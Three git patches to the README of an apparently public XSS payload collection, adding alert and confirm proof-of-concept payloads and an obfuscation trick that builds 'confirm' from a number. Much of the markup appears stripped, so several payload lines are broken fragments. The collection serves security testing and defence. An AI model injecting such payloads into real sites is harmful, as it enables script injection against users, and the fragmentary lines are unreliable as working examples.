From eddc716d8c4ea5a472a2e0d08d53b87d5c8c3705 Mon Sep 17 00:00:00 2001 From: c14dd49h <47661120+c14dd49h@users.noreply.github.com> Date: Thu, 22 Jul 2021 14:47:36 +0200 Subject: [PATCH 1/3] Update README.md --- XSS Injection/README.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 43804cd..440006c 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -158,6 +158,8 @@ Most tools are also suitable for blind XSS attacks: ipt>alert('XSS')ipt> "> "> + + // Img payload @@ -177,6 +179,8 @@ Most tools are also suitable for blind XSS attacks: "> ">(`Firefox` is the only browser which allows self closing script) +alert('33') +alert('33') // Div payload
MOVE HERE
From ee12f8e480d13750b14c0905c850a0476bbd6ba4 Mon Sep 17 00:00:00 2001 From: c14dd49h <47661120+c14dd49h@users.noreply.github.com> Date: Thu, 22 Jul 2021 16:55:03 +0200 Subject: [PATCH 2/3] Update README.md --- XSS Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 440006c..bb8ee49 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -160,6 +160,7 @@ Most tools are also suitable for blind XSS attacks: "> + //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" // Img payload From 1fd9260d1e480ece4d1f3e245e27352f292fc1a4 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 31 Jul 2021 11:28:23 +0200 Subject: [PATCH 3/3] Update README.md --- XSS Injection/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index bb8ee49..641d526 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -180,8 +180,8 @@ Most tools are also suitable for blind XSS attacks: "> ">(`Firefox` is the only browser which allows self closing script) -alert('33') -alert('33') +
MOVE HERE